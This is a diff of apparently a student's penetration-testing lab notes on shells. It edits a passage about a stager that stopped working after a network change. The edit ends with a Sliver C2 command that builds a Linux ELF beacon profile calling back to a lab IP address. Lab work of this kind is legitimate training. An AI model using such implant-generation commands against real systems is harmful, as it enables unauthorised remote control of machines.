Ali-Mikael/Pen-testing/h6-shells.md

 ```
 Nahh, not yet..

-I pondered and tinkered until I realized it's because we switched networks after shutting down vagrant.. 😂
+I pondered and tinkered until I realized the main issue right now is the fact that we switched networks after shutting down vagrant.. 😂

-So I configured the whole shabang again with new connection details:
+I figured it out when executing the stager locally and it didn't work anymore.
+Before it was working locally at least.
+So I configured the whole shabang again with new connection details.

+## Here we go again part xx
 ```console
 sliver > profiles new beacon -m 192.168.120.233 -o linux -f elf -e linuxServerExe2p0